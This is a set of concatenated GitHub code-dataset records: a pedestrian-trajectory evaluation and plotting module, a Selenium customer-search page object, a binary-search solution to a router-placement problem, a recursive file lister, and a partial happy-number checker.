setting","repo_name":"boycehbz/MvSMPLfitting","sub_path":"code/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"76"} +{"seq_id":"36901900849","text":"import os\nfrom collections import defaultdict\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom dataloader import DataLoader\nfrom evaluation import Evaluation\nfrom util import substring\n\n\nclass Attributes(object):\n def __init__(self, origin_data, origin_xy_data,\n result_data, result_xy_data, config, orign_single_dict, frame_list):\n \"\"\"Init data here\n Args:\n self._origin_data: A dict recording gt data\n self._origin_xy_data: A dict recording gt xy data\n self._result_data: A DataFrame recording pred data\n self._result_xy_data: A DataFrame recording pred xy data\n self._caculate_result: A DataFrame recording result data\n self._cfg: A Config Class recording config\n self._index: A Series recording index\n self._orign_single_dict: A DataFrame recording first pred data(used for making idx)\n self._frame_list: A list recording frame list\n \"\"\"\n self._origin_data = origin_data\n self._origin_xy_data = origin_xy_data\n self._result_data = result_data\n self._result_xy_data = result_xy_data\n self._caculate_result = None\n self._cfg = config\n self._index = self._result_data.index\n self._orign_single_dict = orign_single_dict\n self._frame_list = frame_list\n\n def operate(self):\n \"\"\"Operate Caculating here\n \"\"\"\n self.velocity_mean()\n self.velocity_std()\n self.distance_mean()\n self.distance_std()\n self.direction()\n self.shake()\n self.crowd()\n\n def paint_operate(self, eva, eval_save_path, save_path):\n \"\"\"Operate Painting here\n \"\"\"\n self.paint_velocity_mean(eva, eval_save_path, save_path=save_path)\n self.paint_velocity_std(eva, eval_save_path, save_path=save_path)\n self.paint_direction(eva, eval_save_path, save_path=save_path)\n self.paint_shake(eva, eval_save_path, save_path=save_path)\n self.paint_crowd(eva, eval_save_path, save_path=save_path)\n\n def velocity_mean(self):\n \"\"\"Caculate velocity mean\n \"\"\"\n print(\"===== starting calculate velocity mean =====\")\n vm = []\n result_data = 
self._result_data.values\n\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n v = d / (0.1 * self._cfg['skip'])\n vm.append(v.mean())\n vm = pd.DataFrame(np.array(vm), index=self._index, columns=['velocity_mean'])\n self._caculate_result = vm if self._caculate_result is None \\\n else pd.concat([self._caculate_result, vm])\n return vm\n\n def velocity_std(self):\n \"\"\"Caculate velocity std\n \"\"\"\n print(\"===== starting calculate velocity std =====\")\n vs = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n v = d / (0.1 * self._cfg['skip'])\n vs.append(v.std())\n vs = pd.DataFrame(np.array(vs), index=self._index, columns=['velocity_std'])\n self._caculate_result = vs if self._caculate_result is None \\\n else pd.concat([self._caculate_result, vs], axis=1)\n return vs\n\n def distance_mean(self):\n \"\"\"Caculate distance mean\n \"\"\"\n print(\"===== starting calculate distance mean =====\")\n dm = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n dm.append(d.mean())\n dm = pd.DataFrame(np.array(dm), index=self._index, columns=['distance_mean'])\n self._caculate_result = dm if self._caculate_result is None else \\\n pd.concat([self._caculate_result, dm], axis=1)\n return dm\n\n def distance_std(self):\n \"\"\"Caculate distance std\n \"\"\"\n print(\"===== starting calculate velocity std =====\")\n ds = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n 
ds.append(d.std())\n ds = pd.DataFrame(np.array(ds), index=self._index, columns=['distance_std'])\n self._caculate_result = ds if self._caculate_result is None else \\\n pd.concat([self._caculate_result, ds], axis=1)\n return ds\n\n def direction(self):\n \"\"\"Caculate direction\n \"\"\"\n print(\"===== starting calculate direction =====\")\n directions = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n vector = np.array([x[1:] - x[:-1], y[1:] - y[:-1]]).T\n base = np.array([x[-1] - x[0], y[-1] - y[0]])\n angle = self.caculate_angle_relative(base, vector)\n dangle = angle[1:] - angle[:-1]\n\n isleft = False\n left_sum_angle = 0.\n left_idx = np.where(dangle < -self._cfg['direction_monotonic_point_deg'])[0]\n if len(left_idx) > 0:\n left_idx, _ = substring(left_idx)\n left_num = np.array([len(item) for item in left_idx])\n max_idx = np.argmax(left_num)\n max_num = left_num[max_idx]\n left_sum_angle = abs(dangle[left_idx[max_idx][0]:left_idx[max_idx][-1] + 1].sum())\n isleft = True if max_num >= self._cfg['direction_monotonic_point_num'] else False\n\n isright = False\n right_sum_angle = 0.\n right_idx = np.where(dangle > self._cfg['direction_monotonic_point_deg'])[0]\n if len(right_idx) > 0:\n right_idx, _ = substring(right_idx)\n right_num = np.array([len(item) for item in right_idx])\n max_idx = np.argmax(right_num)\n max_num = right_num[max_idx]\n right_sum_angle = \\\n abs(dangle[right_idx[max_idx][0]:right_idx[max_idx][-1] + 1].sum())\n isright = True if max_num >= self._cfg['direction_monotonic_point_num'] else False\n\n d_threshold = self._cfg['direction_dist'] * (len(each_gt_data) / (self._cfg['seq'] * 2))\n if (x.max() - x.min()) < d_threshold and (y.max() - y.min()) < d_threshold:\n direction = 'static'\n elif isleft and left_sum_angle > self._cfg['direction_deg']:\n direction = 'left'\n elif isright and right_sum_angle > self._cfg['direction_deg']:\n direction = 'right'\n else:\n direction = 'straight'\n directions.append(direction)\n directions = pd.DataFrame(directions, index=self._index, columns=['directions'])\n self._caculate_result = directions if self._caculate_result is None else pd.concat(\n [self._caculate_result, directions], axis=1)\n return directions\n\n def shake(self):\n \"\"\"Caculate shake data here\n \"\"\"\n print(\"===== starting calculate shake =====\")\n shakes = []\n ds = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n xy = np.array([[[x[i], y[i]], [x[i + 1], y[i + 1]], [x[i + 2], y[i + 2]]]\n for i in range(len(x) - 2)])\n a = 
np.sqrt(((xy[:, 0, :] - xy[:, 1, :]) ** 2).sum(1))\n b = np.sqrt(((xy[:, 1, :] - xy[:, 2, :]) ** 2).sum(1))\n c = np.sqrt(((xy[:, 2, :] - xy[:, 0, :]) ** 2).sum(1))\n p = (a + b + c) / 2\n s = np.sqrt(p * (p - a) * (p - b) * (p - c))\n d = 2 * s / b\n d[np.isnan(d)] = -1\n d = d.max()\n ds.append(d)\n if d < self._cfg['shake_d']:\n shake = 'smooth'\n else:\n shake = 'jitter'\n shakes.append(shake)\n shakes = pd.DataFrame(shakes, index=self._index, columns=['shakes'])\n self._caculate_result = shakes if self._caculate_result is None else pd.concat(\n [self._caculate_result, shakes], axis=1)\n return shakes\n\n def crowd(self):\n \"\"\"Caculate crowd data here\n \"\"\"\n crowds = []\n origin_dict = self._orign_single_dict\n new_dict = defaultdict(lambda: [])\n for idx, _ in origin_dict.items():\n folder, actor, _, start_fid = idx.split('_')[:4]\n new_dict[folder + '_' + actor + '_' + start_fid].append(idx)\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n crowd = 0\n idx = self._index[i]\n folder, actor, pid, _ = idx.split('_')[:4]\n pred_fid = int(each_result_data[2])\n this_data = np.array(origin_dict\n [folder + '_' + actor + '_' + pid + '_' + str(pred_fid)]\n [:2]).astype(np.float32)\n for around_idx in new_dict[folder + '_' + actor + '_' + str(pred_fid)]:\n around_pid = around_idx.split('_')[2]\n if int(around_pid) == int(pid):\n continue\n around_data = np.array(origin_dict[around_idx][:2]).astype(np.float32)\n dist = np.sqrt(((this_data - around_data) ** 2).sum())\n if dist < self._cfg['crowd_dist']:\n crowd += 1\n crowds.append(crowd)\n crowds = pd.DataFrame(crowds, index=self._index, columns=['crowds'])\n self._caculate_result = crowds if self._caculate_result is None else pd.concat(\n [self._caculate_result, crowds], axis=1)\n return crowds\n\n @staticmethod\n def caculate_distance(x, y):\n \"\"\"Caculate distance in trace\n \"\"\"\n vector = np.array([x[1:] - x[:-1], y[1:] - y[:-1]]).T\n distance = np.sqrt((vector ** 2).sum(1))\n return distance\n\n @staticmethod\n def caculate_angle_relative(base, vector):\n \"\"\"caculate relative angles between base and vector\n\n Args:\n base: A numpy array with shape (2,)\n vector: A numpy array with shape (n,2)\n\n Returns:\n A numpy array with shape(n,)\n \"\"\"\n\n def caculate_angley(vector):\n # vector np(n,2) 与y轴夹角0-360\n base = np.array([0., 1.])\n numerator = np.sum(vector * base, 1)\n denominator = np.sqrt(np.sum(base ** 2)) * np.sqrt(np.sum(vector ** 2, 1))\n denominator = np.clip(denominator, 1e-10, np.inf)\n cos = numerator / denominator\n angle = np.arccos(cos) * 180 / np.pi\n angle = np.clip(angle, 0., 180.)\n angle[vector[:, 0] < 0] = 360. - angle[vector[:, 0] < 0]\n return angle\n\n vector = np.concatenate([base.reshape(1, 2), vector], 0)\n angley = caculate_angley(vector)\n angle = (angley - angley[0])[1:] # -360~360\n angle[angle > 180.] = angle[angle > 180.] - 360\n angle[angle < -180.] = angle[angle < -180.] 
+ 360 # -180~180\n return angle\n\n def concate_trace_result(self, data, is_result=False):\n \"\"\"Concate data with self._caculate_result\n\n return:\n new: A DataFrame recording caculate result\n caculate_size: A int recording numbers of result\n \"\"\"\n new = pd.concat([data, self._caculate_result], axis=1)\n if is_result:\n self._caculate_result = new\n caculate_size = data.shape[1]\n return new, caculate_size\n\n def get_data(self):\n return self._result_data\n\n def get_xy_data(self):\n return self._result_xy_data\n\n def get_result_data(self):\n return self._caculate_result\n\n def get_index_data(self):\n return self._index\n\n def select_discrete_attr(self, index_data, name, attr):\n index = (index_data.ix[:, name] == attr)\n return index\n\n def select_continuous_attr(self, index_data, name, min_, max_):\n index = (index_data.ix[:, name] >= min_) & (index_data.ix[:, name] <= max_)\n return index\n\n def paint_direction(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None):\n attr = ['static', 'left', 'right', 'straight']\n save_path_pie = os.path.join(save_path, 'directions_pie.png')\n self.paint_discrete_pie('directions', attr, figsize, save_path_pie)\n save_path_bl = os.path.join(save_path, 'directions_broken_line.png')\n self.paint_discrete_trace(eva, 'directions', attr, save_path_bl, eval_save_path)\n\n def paint_shake(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None):\n attr = ['smooth', 'jitter']\n save_path_pie = os.path.join(save_path, 'shakes_pie.png')\n self.paint_discrete_pie('shakes', attr, figsize, save_path_pie)\n save_path_bl = os.path.join(save_path, 'shakes_broken_line.png')\n self.paint_discrete_trace(eva, 'shakes', attr, save_path_bl, eval_save_path)\n\n def paint_crowd(self, eva, eval_save_path,\n figsize=(30, 20), save_path=None, interval=5, interval_part=None,\n max_=1.):\n save_path_pie = os.path.join(save_path, 'crowd_pie.png')\n self.paint_continuous_pie('crowds', figsize, save_path_pie,\n interval, interval_part, max_)\n save_path_bl = os.path.join(save_path, 'crow_broken_line.png')\n self.paint_continuous_trace(eva, 'crowds', save_path_bl,\n eval_save_path, interval=interval)\n\n def paint_velocity_mean(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None, interval=5, interval_part=None,\n max_=1.):\n save_path_pie = os.path.join(save_path, 'velocity_mean_pie.png')\n self.paint_continuous_pie('velocity_mean', figsize, save_path_pie,\n interval, interval_part, max_)\n save_path_bl = os.path.join(save_path, 'velocity_mean_broken_line.png')\n self.paint_continuous_trace(eva, 'velocity_mean', save_path_bl, eval_save_path, interval=5)\n\n def paint_velocity_std(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None, interval=5, interval_part=None,\n max_=1.):\n save_path_pie = os.path.join(save_path, 'velocity_std_pie.png')\n self.paint_continuous_pie('velocity_std', figsize, save_path_pie,\n interval, interval_part, max_)\n save_path_bl = os.path.join(save_path, 'velocity_std_broken_line.png')\n self.paint_continuous_trace(eva, 'velocity_std', save_path_bl, eval_save_path, interval=5)\n\n def paint_discrete_pie(self, name, attr, figsize=(5, 5), save_path=None, data=None):\n if data is None:\n data = self._caculate_result[name].values\n else:\n data = data[name].values\n plt.figure(figsize=figsize)\n\n count = []\n for type_ in attr:\n count.append((data == type_).sum())\n count = np.array(count)\n percent = 100. 
* count / count.sum()\n plt.subplot(1, 1, 1)\n patches, _ = plt.pie(count, shadow=False, startangle=90)\n labels = ['{0} {1:1.2f}%'.format(i, j) for i, j in zip(attr, percent)]\n plt.axis('equal')\n plt.legend(patches, labels, loc='center right', fontsize=30)\n if name != 'crowd':\n plt.title(name, fontsize='xx-large')\n else:\n pass\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n def paint_continuous_pie(self, name, figsize=(20, 20), save_path=None,\n interval=30, interval_part=None, max_partial=1.,\n data=None):\n if data is None:\n data = self._caculate_result[name].values\n else:\n data = data[name].values\n plt.figure(figsize=figsize)\n data_ = np.linspace(data.min(), data.max(), interval + 1)\n count = []\n for i in range(interval):\n min_, max_ = data_[i], data_[i + 1]\n num = ((data >= min_) & (data <= max_)).sum()\n count.append(num)\n count = np.array(count)\n percent = 100. * count / count.sum()\n if interval_part is None:\n plt.subplot(1, 1, 1)\n else:\n plt.subplot(1, 2, 1)\n patches, _ = plt.pie(count, shadow=False, startangle=90)\n labels = ['{0:1.2f}~{1:1.2f} {2:1.3f}%'.format(data_[i],\n data_[i + 1], percent[i])\n for i in range(interval)]\n plt.axis('equal')\n plt.legend(patches, labels, loc='center left', fontsize=30)\n plt.title(name + ' (m/s)', fontsize=30)\n\n if interval_part is not None:\n data_ = np.linspace(data.min(), max_partial, interval_part + 1)\n count = []\n for i in range(interval_part):\n min_, max_ = data_[i], data_[i + 1]\n num = ((data >= min_) & (data <= max_)).sum()\n count.append(num)\n count = np.array(count)\n percent = 100. * count / count.sum()\n\n plt.subplot(1, 2, 2)\n patches, _ = plt.pie(count, shadow=False, startangle=90)\n labels = ['{0:1.2f}~{1:1.2f} m/s {2:1.3f}%'.format(data_[i],\n data_[i + 1], percent[i]) for i in\n range(interval_part)]\n plt.axis('equal')\n plt.legend(patches, labels, loc='center right', fontsize=30)\n plt.title(name + '_partial (m/s)', fontsize=30)\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n def paint_discrete_trace(self, eva, name, attr, save_path,\n eval_save_path, figsize=(30, 20), data=None, xy_data=None):\n if data is None and xy_data is None:\n data, data_num = self.concate_trace_result(self._result_data)\n data_xy, data_xy_num = self.concate_trace_result(self._result_xy_data)\n else:\n data, data_num = self.concate_trace_result(data)\n data_xy, data_xy_num = self.concate_trace_result(xy_data)\n plt.figure(figsize=figsize)\n\n mse_list = []\n mse_only_list = []\n for type_ in attr:\n print(\"====== evaluating \", str(type_), \" mse =====\")\n with open(eval_save_path, 'a') as f:\n f.write(\"====== evaluating \" + str(type_) + \" mse =====\\n\")\n this_attr_data = data.ix[(data[name] == type_), :]\n\n if len(this_attr_data.values) == 0:\n attr.remove(type_)\n continue\n this_data = this_attr_data.ix[:, :data_num]\n this_xy_attr_data = data_xy.ix[(data_xy[name] == type_), :]\n this_xy_data = this_xy_attr_data.ix[:, :data_xy_num]\n mse, mse_only = eva.eval(self._origin_xy_data, this_xy_data,\n this_data, eval_save_path, self._cfg['skip'])\n mse_list.append(mse)\n mse_only_list.append(mse_only)\n mse_list = np.array(mse_list)\n mse_only_list = np.array(mse_only_list)\n for i in range(0, mse_list.shape[1]):\n x_axis = [i for i in range(0, len(attr))]\n y_axis = mse_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_\" + str(self._frame_list[i]))\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), 
ha='center', va='bottom', fontsize=40)\n y_axis = mse_only_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_only_\" + str(self._frame_list[i]))\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=40)\n index = attr\n plt.xticks(x_axis, index, fontsize=40)\n plt.title(name + '_mse', fontsize=40)\n plt.yticks(fontsize=40)\n plt.legend(loc='best', fontsize=40)\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n def paint_continuous_trace(self, eva, name, save_path,\n eval_save_path, interval=5,\n figsize=(30, 20), data=None, xy_data=None):\n if data is None and xy_data is None:\n data, data_num = self.concate_trace_result(self._result_data)\n data_xy, data_xy_num = self.concate_trace_result(self._result_xy_data)\n else:\n data, data_num = self.concate_trace_result(data)\n data_xy, data_xy_num = self.concate_trace_result(xy_data)\n plt.figure(figsize=figsize)\n res = data[name].values\n data_ = np.linspace(res.min(), res.max(), interval + 1)\n mse_list = []\n mse_only_list = []\n index = []\n\n for i in range(interval):\n print(\"====== evaluating \", name, \" \", str(i), \" mse =====\")\n with open(eval_save_path, 'a') as f:\n f.write(\"====== evaluating \" + name + \" \" + str(i) + \" mse =====\\n\")\n min_, max_ = data_[i], data_[i + 1]\n index.append(str(round(min_, 2)) + '~' + str(round(max_, 2)))\n this_attr_data = data.ix[(data[name] >= min_) & (data[name] <= max_), :]\n if this_attr_data is None:\n continue\n this_data = this_attr_data.ix[:, :data_num]\n this_xy_attr_data = data_xy.ix[(data_xy[name] >= min_) & (data_xy[name] <= max_), :]\n this_xy_data = this_xy_attr_data.ix[:, :data_xy_num]\n mse, mse_only = eva.eval(self._origin_xy_data,\n this_xy_data, this_data, eval_save_path, self._cfg['skip'])\n mse_list.append(mse)\n mse_only_list.append(mse_only)\n mse_list = np.array(mse_list)\n mse_only_list = np.array(mse_only_list)\n\n for i in range(0, mse_list.shape[1]):\n x_axis = [i for i in range(interval)]\n y_axis = mse_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_\" + str(self._frame_list[i]))\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=20)\n y_axis = mse_only_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_only_\" + str(self._frame_list[i]))\n plt.xticks(x_axis, index, fontsize=40)\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=20)\n plt.title(name + '_mse', fontsize=40)\n plt.legend(loc='best', fontsize=40)\n plt.yticks(fontsize=40)\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n\nif __name__ == '__main__':\n class Config():\n config_ped = {\n 'direction_monotonic_point_deg': 0.2,\n 'direction_monotonic_point_num': 5,\n 'direction_dist': 0.5,\n 'direction_deg': 5,\n 'shake_d': 3.0, # 3\n 'skip': 5,\n 'seq': 10,\n 'crowd_dist': 5\n }\n\n @click.command()\n @click.option('--origin_path', default=\"../../data/origin_tc/test_selected\",\n help=\"A string recording origin path\")\n @click.option('--result_path', default=\"../../data/result_tc/test_selected/result_skip5\",\n help=\"A string recording result path\")\n @click.option('--eval_path', default=\"./eval.txt\",\n help=\"A string recording eval txt path\")\n @click.option('--paint_save_path', default=\"../../data/paint/model_1\",\n help=\"A string recording image saved path\")\n @click.option('--actor', default=\"ped\",\n help=\"A string recording actor to evaluate\")\n 
@click.option('--is_eval_all', default=True, type=str,\n help=\"all attr to eval\")\n @click.option('--is_group_attr', default=False, help=\"if make group attr\")\n def start(origin_path, result_path, eval_path,\n paint_save_path, actor, is_eval_all, is_group_attr):\n attr_name = ['velocity_mean', 'shake']\n origin = DataLoader()\n origin.variable_operate(origin_path, os.path.join(origin_path, 'test.txt'), actor)\n origin_data = origin.variable_get_data()\n origin_xy_data = origin.variable_get_data_with_window(2, each_len=2, stride=12)\n orign_single_dict = origin.variable_convert_data_to_dict(origin_data, stride=12)\n pred = DataLoader()\n pred.operate(result_path, os.path.join(result_path, \"data_out.txt\"), actor)\n pred_data = pred.get_data()\n pred_xy_data = pred.get_data_with_window(4, 2)\n config = getattr(Config, 'config_ped')\n frame_list = [4, 10]\n eva = Evaluation(frame_list)\n eval_save_path = eval_path\n image_save_path = paint_save_path\n with open(eval_save_path, 'a') as f:\n f.write(\"skip is %d\\n\" % config['skip'])\n attr = Attributes(origin_data, origin_xy_data,\n pred_data, pred_xy_data, config, orign_single_dict, frame_list)\n if is_eval_all:\n attr.operate()\n attr.paint_operate(eva, eval_save_path, save_path=image_save_path)\n else:\n for type_ in attr_name:\n getattr(attr, type_)()\n getattr(attr, \"paint_\" + type_)(eva, eval_save_path, save_path=image_save_path)\n\n if is_group_attr:\n # smooth & v <= 3\n result_data = attr.get_result_data()\n\n index1 = attr.select_continuous_attr(result_data, 'velocity_mean', 0, 3)\n index2 = attr.select_discrete_attr(result_data, 'shakes', 'smooth')\n index = (index1 & index2)\n index = index.to_frame()\n index.columns = [\"un_normal\"]\n attr.concate_trace_result(index, is_result=True)\n attr_type = [True, False]\n save_path_pie = os.path.join(paint_save_path, 'un_normal_pie.png')\n attr.paint_discrete_pie(\"un_normal\", attr_type, save_path=save_path_pie)\n save_path_pie = os.path.join(paint_save_path, 'un_normal_trace.png')\n attr.paint_discrete_trace(eva, \"un_normal\",\n attr_type, save_path=save_path_pie, eval_save_path=eval_save_path)\n\n # pylint: disable=no-value-for-parameter\n start()\n","repo_name":"EdSimp/visual_eval","sub_path":"Attributes.py","file_name":"Attributes.py","file_ext":"py","file_size_in_byte":30911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31185777143","text":"from selenium.webdriver.common.by import By\n\n\nclass SearchCustomer:\n txt_email_id = (By.ID, \"SearchEmail\")\n txt_firstname_id = (By.ID, \"SearchFirstName\")\n txt_lastname_id = (By.ID, \"SearchLastName\")\n btn_search_xpath = (By.XPATH, \"//button[@id='search-customers']\")\n table_searchresults_xpath = (By.XPATH, \"//div[@class='dataTables_scrollHead']\")\n table_xpath = (By.XPATH, \"//table[@id='customers-grid']\")\n table_rows_xpath = (By.XPATH, \"//table[@id='customers-grid']//tbody/tr\")\n table_columns_xpath = (By.XPATH, \"//table[@id='customers-grid']//tbody/tr/td\")\n\n def __init__(self, driver):\n self.driver = driver\n\n def setEmail(self, Email):\n self.driver.find_element(*self.txt_email_id).clear()\n self.driver.find_element(*self.txt_email_id).send_keys(Email)\n\n def setFname(self, Fname):\n self.driver.find_element(*self.txt_firstname_id).clear()\n self.driver.find_element(*self.txt_firstname_id).send_keys(Fname)\n\n def setLname(self, Lname):\n self.driver.find_element(*self.txt_lastname_id).clear()\n 
self.driver.find_element(*self.txt_lastname_id).send_keys(Lname)\n\n def clickonSearch(self):\n self.driver.find_element(*self.btn_search_xpath).click()\n\n def getNoofRows(self):\n return len(self.driver.find_elements_by_xpath(self.table_rows_xpath))\n\n def getNoofColumns(self):\n return len(self.driver.find_elements_by_xpath(self.table_columns_xpath))\n\n def searchbyemail(self, email):\n flag = False\n for r in range(1, self.getNoofRows()+1):\n table = self.driver.find_element_by_xpath(self.table_xpath)\n emailid = table.find_element_by_xpath(\"//table[@id='customers-grid']/tbody/tr[\"+str(r)+\"]/td[2]\").text\n if emailid == email:\n flag = True\n break\n return flag\n\n def searchbyname(self, Name1):\n flag = False\n for r in range(1, self.getNoofRows()+1):\n table = self.driver.find_element_by_xpath(self.table_xpath)\n name = table.find_element_by_xpath(\"//table[@id='customers-grid']/tbody/tr[\"+str(r)+\"]/td[3]\")\n if name == Name1:\n flag = True\n break\n return flag\n\n\n\n\n","repo_name":"praveen3384/nopcommerceApp","sub_path":"pageObjects/SearchCustomerPage.py","file_name":"SearchCustomerPage.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25972925810","text":"'''\n공유기 사이의 거리를 가능한 범위 안에서 임의로 정하고 배치한 후, 문제에서 제시한 개수 조건이 맞는지 확인해서 맞으면 그렇게 배치한다.\n이때 임의로 정하는 과정에서 이분탐색을 사용한다.\n=> 공유기 사이의 거리는 최소 1, 최대 xN-x1이다.\n해당 범위 내에서 조건을 만족하는 거리를 탐색한다.\n'''\n\nn,c = map(int, input().split())\n\nhomeList= sorted([int(input()) for _ in range(n)])\nhomeLength = len(homeList)\n\nresult = 0\nstart = 1\nend = homeList[-1] - homeList[0]\n\n\nwhile(end >= start):\n half = (start + end)//2\n\n # 배치하기\n beforeDistance = -1\n homeCount = 0\n for home in homeList:\n if(homeCount==0 or home-beforeDistance>=half):\n homeCount+=1\n beforeDistance = home\n if homeCount>c: break\n\n if homeCount>=c:\n # c개 이상으로 배치되면 => 거리를 넓혀야 함\n result = half\n start = half+1\n elif homeCount 거리를 좁혀야 함\n end = half-1\n \nprint(result)","repo_name":"sadie100/Practice_algorithm","sub_path":"백준/답봄/gold/2110_gold4_공유기 설치.py","file_name":"2110_gold4_공유기 설치.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42625626296","text":"# coding=utf-8\r\nfrom __future__ import print_function\r\nimport os\r\n\r\nall_file = []\r\n\r\n\r\ndef get_all_file(path):\r\n all_file_list = os.listdir(path)\r\n for f in all_file_list:\r\n file_path = os.path.join(path, f)\r\n # 判断是不是文件夹\r\n if os.path.isdir(file_path):\r\n get_all_file(file_path)\r\n all_file.append(file_path)\r\n return all_file\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n src_path = \"C:\\\\he\\\\py_proj_27\\\\set_proxy\\\\code\\\\default\\\\python27\\\\1.0\\\\lib\\\\site-packages\\\\adodbapi\"\r\n allfiles = get_all_file(src_path)\r\n\r\n for item in allfiles:\r\n print(item)\r\n","repo_name":"heyongman/python3","sub_path":"portable_python/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6513629899","text":"a=int(input(\"Enter a number : \"))\ndef check(a):# Function for checking whether number is a happy number\n sum=0\n happy=False\n for i in range (101):\n while a>0:\n r=a%10\n sum=sum+(r**2)\n a=a//10\n if sum==1:\n happy=True\n break\n else:\n a=sum\n sum=0\n return happy\nif check(a)==True:\n print(\"The number is a Happy 
